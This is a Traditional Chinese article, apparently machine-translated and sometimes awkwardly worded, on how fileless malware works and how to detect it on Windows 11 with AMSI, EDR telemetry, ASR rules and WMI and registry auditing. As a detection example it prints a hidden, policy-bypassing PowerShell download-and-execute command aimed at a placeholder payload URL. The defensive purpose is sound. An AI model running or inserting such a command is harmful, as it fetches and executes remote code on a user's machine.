如何在 Windows 11 中偵測危險的無檔案惡意軟體

¿如何偵測危險的無文件惡意軟體？ 無文件攻擊活動顯著增加，更糟的是， Windows 11 也未能倖免。這種方法繞過了磁碟，直接依賴記憶體和合法的系統工具；這就是為什麼基於特徵碼的防毒軟體難以識別它的原因。如果您正在尋找一種可靠的檢測方法，答案在於結合多種方法。 遙測、行為分析和 Windows 控件.

在目前的生態系統中，濫用 PowerShell、WMI 或 Mshta 的攻擊活動與更複雜的技術並存，例如記憶體注入、「不觸及」磁碟的持久化，甚至更複雜的技術。 韌體濫用關鍵在於了解威脅地圖、攻擊階段以及即使所有操作都在 RAM 內進行，它們也會留下哪些訊號。

什麼是無檔案惡意軟體？為什麼它在 Windows 11 中是一個值得關注的問題？

當我們談到「無檔案」威脅時，我們指的是惡意程式碼， 您無需上傳新的可執行檔。 它需要在檔案系統中運作。它通常被注入到正在運行的進程中，並在 RAM 中執行，依賴由 Microsoft 簽署的解釋器和二進位檔案（例如， PowerShell、WMI、rundll32、mshta這樣可以減少你的網路足跡，並允許你繞過那些只尋找可疑檔案的引擎。

即使是利用漏洞發起指令的辦公室文件或PDF文件也被認為是這種現象的一部分，因為 啟動記憶體執行 不留下可用於分析的二進位。濫用 巨集和DDE 在 Office 中，因為程式碼是在 WinWord 等合法進程中執行的。

攻擊者將社會工程學（網路釣魚、垃圾連結）與技術陷阱結合：使用者的點擊會啟動一系列操作，其中腳本會下載最終有效載荷並將其載入到記憶體中執行。 避免留下痕跡 在磁碟上。其目標包括資料竊取、勒索軟體執行以及靜默橫向移動。

依系統佔用空間劃分的類型：從「純粹型」到混合型

為了避免概念混淆，根據威脅與檔案系統的互動程度進行分類很有幫助。這種分類方法可以更清楚地闡明… 哪些東西會留存下來？程式碼存在於哪裡？它會留下哪些痕跡？.

類型 I：無文件活動

完全無檔案的惡意軟體不會向磁碟寫入任何內容。一個典型的例子是利用… 網路漏洞 （就像當年的 EternalBlue 漏洞）在核心記憶體中植入後門（例如 DoublePulsar 漏洞）。在這種情況下，所有操作都在 RAM 中進行，檔案系統中不會留下任何痕跡。

另一個選擇是污染 固件 元件方面的問題包括：BIOS/UEFI、網路介面卡、USB 週邊裝置（BadUSB 類型的技術）甚至 CPU 子系統。這些問題在重啟和重裝系統後仍然存在，而且更加棘手的是… 很少有產品會檢查韌體這些攻擊手段複雜，發生頻率較低，但由於其隱蔽性和持久性，因此十分危險。

第二類：間接存檔活動

在這種情況下，惡意軟體不會「留下」自身的執行文件，而是使用系統管理的容器，這些容器本質上是以文件的形式儲存的。例如，植入後門的程序。 PowerShell命令 在 WMI 儲存庫中，並使用事件過濾器觸發其執行。雖然可以透過命令列安裝而無需刪除二進位文件，但 WMI 儲存庫作為合法資料庫駐留在磁碟上，因此很難在不影響系統的情況下將其清理乾淨。

從實際角度來看，它們被認為是無文件的，因為該容器（WMI、註冊表等） 它不是一個典型的可偵測可執行檔。 而且清理起來也並非易事。結果是：隱蔽持久化，幾乎不留任何「傳統」痕跡。

第三類：需要文件才能運作

有些案例維持著 無文件持久化 從邏輯層面來說，它們需要一個基於文件的觸發器。 Kovter 就是一個典型的例子：它會註冊一個隨機副檔名的 shell 動詞；當開啟具有該副檔名的檔案時，就會啟動一個使用 mshta.exe 的小腳本，該腳本會從登錄中重建惡意字串。

訣竅在於，這些帶有隨機擴展名的「誘餌」檔案並不包含可分析的有效載荷，而大部分程式碼都位於… 註冊 （另一個容器）。這就是為什麼它們被歸類為無檔案影響，儘管嚴格來說，它們依賴一個或多個磁碟工件作為觸發器。

感染的媒介與「宿主」：病毒從哪裡進入人體，又從哪裡藏匿？

為了提高檢測能力，繪製感染入口和宿主的分佈圖至關重要。這種視角有助於設計 具體控制 優先處理適當的遙測資料。

漏洞

• 基於文件 （第三類）：文件、執行檔、舊版 Flash/Java 檔案或 LNK 檔案可能利用瀏覽器或處理它們的引擎，將 shellcode 載入到記憶體中。第一個攻擊途徑是文件，但有效載荷會傳輸到 RAM。
• 基於網路 （第一類）：利用漏洞（例如 SMB 漏洞）的軟體包可以在用戶空間或核心中執行。 WannaCry 勒索軟體使這種方法廣為人知。 直接記憶體載入 沒有新文件。

硬體

• 設備 （類型 I）：磁碟或網路卡韌體可能被竄改並植入惡意程式碼。此類攻擊難以檢查，且會在作業系統之外持續存在。
• CPU 和管理子系統 （第一類）：諸如英特爾的ME/AMT等技術已經展示了通往以下領域的途徑 網路和作業系統外部執行它以極低的攻擊力發動攻擊，具有很高的隱蔽性。
• USB （類型 I）：BadUSB 可讓您重新編程 USB 隨身碟以模擬鍵盤或網路卡，並啟動指令或重新導向流量。
• BIOS / UEFI （類型 I）：惡意韌體重編程（例如 Mebromi），在 Windows 啟動之前執行。
• 管理程序 （類型 I）：在作業系統底層部署一個小型虛擬機器管理程式來隱藏自身存在。這種情況雖然罕見，但已經以虛擬機器管理程式 rootkit 的形式出現。

執行和注入

• 基於文件 （第三類）：EXE/DLL/LNK 或計畫任務，向合法進程注入程式。
• 宏 （類型 III）：Office 中的 VBA 可以透過欺騙手段，在使用者同意的情況下解碼和執行有效載荷，包括完整的勒索軟體。
• 腳本 （類型 II）：從檔案、命令列執行 PowerShell、VBScript 或 JScript 腳本 服務、註冊或WMI攻擊者可以在遠端會話中輸入腳本，而無需接觸磁碟。
• 引導記錄（MBR/Boot） （第二類）：像 Petya 這樣的惡意軟體會覆蓋開機磁區，從而在啟動時取得控制權。它位於檔案系統之外，但作業系統和現代解決方案可以存取並恢復它。

無檔案攻擊的運作方式：階段與訊號

雖然這些攻擊活動不會留下可執行文件，但它們遵循一定的分階段邏輯。了解這些邏輯有助於監控。 事件和過程之間的關係 確實會留下痕跡。

• 初步訪問網路釣魚攻擊利用連結或附件、被入侵的網站或被盜的憑證。許多攻擊鏈始於一個觸發命令的 Office 文件。 PowerShell的.
• 堅持不懈：透過 WMI（過濾器和訂閱）建立後門， 註冊表執行鍵 或執行計劃任務，在沒有新的惡意檔案的情況下重新啟動腳本。
• 滲漏收集到資訊後，會使用受信任的進程（瀏覽器、PowerShell、bitsadmin）將資訊傳送到網路之外，以混合流量。

這種模式尤其陰險，因為 攻擊指標 它們隱藏在正常之中：命令列參數、進程鏈、異常的出站連接或對注入 API 的存取。

常用技巧：從記憶到記錄

演員們依靠一系列 方法 這些措施可以最大限度地提高隱蔽性。了解最常見的幾種觸發探測機制有助於有效識別目標。

• 紀念居民將有效載荷載入到等待啟動的受信任進程的空間。 rootkit 和 hooks 在內核中，它們提高了隱蔽程度。
• 註冊表中的持久性將加密資料塊保存在金鑰中，並使用合法的啟動器（例如 mshta、rundll32 或 wscript）重新啟動它們。臨時安裝程序可以自毀，以最大限度地減少其佔用空間。
• 憑證釣魚攻擊者利用竊取的使用者名稱和密碼，執行遠端 shell 並植入惡意程式。 靜默訪問 在登錄或 WMI 中。
• 「無檔案」勒索軟體加密和 C2 通訊由 RAM 協調，從而減少了在損害顯現之前被偵測到的機會。
• 手術包：能夠偵測漏洞並在使用者點擊後部署僅記憶體有效載荷的自動化鏈。
• 包含程式碼的文檔巨集和 DDE 等機制可以在不將可執行檔儲存到磁碟的情況下觸發命令。

產業研究已經顯示出明顯的峰值：在2018年的某個時期， 成長超過90% 在基於腳本和 PowerShell 的鍊式攻擊中，這表明該向量因其有效性而受到青睞。

企業和供應商面臨的挑戰：為什麼光是封鎖是不夠的

停用 PowerShell 或永久禁止巨集的想法固然誘人，但是 你會破壞操作。PowerShell 是現代管理的支柱，Office 在企業中必不可少；盲目阻止通常是不可行的做法。

此外，還有一些方法可以繞過基本控制：透過 DLL 和 rundll32 執行 PowerShell，將腳本打包成 EXE 文件， 請自備 PowerShell 程式。 甚至可以將腳本隱藏在圖像中並將其提取到記憶體中。因此，辯護不能僅基於否認工具的存在。

另一個常見的錯誤是將整個決策過程委託給雲端：如果代理程式必須等待伺服器的回應， 你將失去即時預防能力可以上傳遙測數據以豐富信息，但是 緩解措施必須在終點進行。.

如何在 Windows 11 中偵測無檔案惡意軟體：遙測和行為

制勝策略是 監控進程和記憶體不是文件。惡意行為比文件的形式更穩定，因此是預防引擎的理想選擇。

• AMSI（反惡意軟體掃描介面）它能夠攔截 PowerShell、VBScript 或 JScript 腳本，即使這些腳本是在記憶體中動態建構的。非常適合在執行前捕獲混淆後的字串。
• 流程監控：起始/結束、進程 ID、父進程和子進程、路由、 命令行 以及哈希值和執行樹，以了解完整的故事。
• 記憶分析：偵測注入、反射或 PE 載入（無需接觸磁碟），以及審查異常可執行區域。
• 啟動扇區保護：在 MBR/EFI 被篡改的情況下進行控制和恢復。

在微軟生態系中，Defender for Endpoint 結合了 AMSI、 行為監測記憶體掃描和基於雲端的機器學習技術用於擴大對新型或混淆變種的偵測能力。其他廠商也採用類似的方法，利用核心駐留引擎進行檢測。

文件到 PowerShell 的相關性實際範例

想像這樣的流程：Outlook 下載附件，Word 開啟文檔，啟用活動內容，然後 PowerShell 使用可疑參數啟動。正確的遙測數據會顯示… 命令行 （例如，ExecutionPolicy Bypass、隱藏視窗），連接到不受信任的網域並建立子進程，該子進程將自身安裝到 AppData 中。

具有本地上下文資訊的智能體能夠 停止和倒車 除了透過 SIEM 或電子郵件/簡訊通知之外，某些產品還會添加根本原因歸因層（StoryLine 類型模型），該層指向的不是可見的進程（Outlook/Word），而是… 完整的惡意線程 並徹底清理該系統的起源。

一個需要注意的典型命令模式可能如下所示： powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');邏輯並非確切的字串，而是 訊號集：策略繞過、隱藏視窗、清除下載和記憶體執行。

AMSI、管道以及每位參與者的角色：從終端到安全營運中心

除了腳本擷取之外，強大的架構還能協調各個步驟，促進調查和回應。 執行任務前掌握的證據越多越好。更好的

• 腳本攔截AMSI 為惡意軟體管道中的靜態和動態分析提供內容（即使是即時產生的）。
• 過程事件收集進程 ID、二進位檔案、哈希值、路由和其他資料。 論點建立導致最終載入的流程樹。
• 檢測和報告偵測結果顯示在產品控制台上，並轉送至網路平台（NDR）以進行活動視覺化。
• 用戶保障即使腳本被注入到記憶體中，框架 AMSI攔截了它 在相容的Windows版本中。
• 管理員權限：啟用腳本檢查的策略配置， 基於行為的阻斷 並從控制台建立報告。
• SOC 工作提取工件（虛擬機器 UUID、作業系統版本、腳本類型、啟動進程及其父進程、雜湊值和命令列）以重建歷史記錄和 電梯規則 未來。

當平台允許導出時 記憶體緩衝區 與執行相關的研究人員可以產生新的檢測結果，並增強對類似變種的防禦能力。

Windows 11 中的實用措施：預防與檢查

除了具備記憶體偵測和 AMSI 的 EDR 功能外，Windows 11 還可讓您關閉攻擊空間並提高可見度。 本機控件.

• PowerShell 中的註冊和限制啟用腳本區塊日誌記錄和模組日誌記錄，盡可能套用受限模式，並控制使用 旁路/隱藏.
• 攻擊面縮減（ASR）規則阻止 Office 進程啟動腳本 WMI濫用/PSExec 不需要時執行。
• 辦公室宏策略：預設停用內部巨集簽章和嚴格信任清單；監控舊版 DDE 流。
• WMI 審計與註冊監控事件訂閱和自動執行鍵（Run、RunOnce、Winlogon），以及任務創建 預定的.
• 啟動保護：啟動安全啟動，檢查 MBR/EFI 完整性，並驗證啟動時是否進行了修改。
• 修補和強化：修復瀏覽器、Office 元件和網路服務中的可利用漏洞。
• 意識：對使用者和技術團隊進行網路釣魚和訊號的培訓 秘密處決.

對於搜索，請專注於以下查詢：透過 Office 建立以 PowerShell/MSHTA 為導向的流程，以及相關的論點 下載字串/下載文件使用明顯的混淆腳本、反射注入和指向可疑頂級域名的出站網路。將這些訊號與信譽度和頻率進行交叉比對，以降低雜訊。

如今，每台引擎都能偵測到什麼？

微軟的企業解決方案結合了AMSI、行為分析、 檢查記憶 此外，它還提供引導扇區保護，以及基於雲端的機器學習模型，以應對不斷湧現的威脅。其他供應商則實施核心級監控，以區分惡意軟體和良性軟體，並自動回溯變更。

一種基於以下方法 處決故事 它可以幫助您識別根本原因（例如，觸發連鎖反應的 Outlook 附件），並緩解整個問題樹：腳本、金鑰、任務和中間二進位文件，避免陷入可見症狀的泥淖。

常見錯誤以及如何避免它們

如果沒有其他管理方案，直接阻止 PowerShell 不僅不切實際，而且還會帶來其他問題。 間接呼叫它的方法巨集也是一樣：要嘛用策略和簽章來管理它們，要嘛業務就會受到影響。最好還是把重點放在遙測和行為規則。

另一個常見的錯誤是認為將應用程式列入白名單就能解決所有問題：無檔案技術正是依賴於此。 受信任的應用程式控制措施應該觀察他們的行為以及他們之間的關係，而不僅僅是觀察他們是否被允許。

綜上所述，當你監控真正重要的因素時，無檔案惡意軟體就不再是「幽靈」了： 行為、記憶和起源 每次執行。結合 AMSI、豐富的進程遙測資料、Windows 11 原生控制以及具有行為分析的 EDR 層，您將獲得優勢。此外，還要製定針對巨集和 PowerShell 的合理策略、WMI/註冊表審核，以及優先處理命令列和進程樹的威脅搜尋，從而構建起一套能夠在這些威脅發出任何信號之前就將其切斷的防禦體系。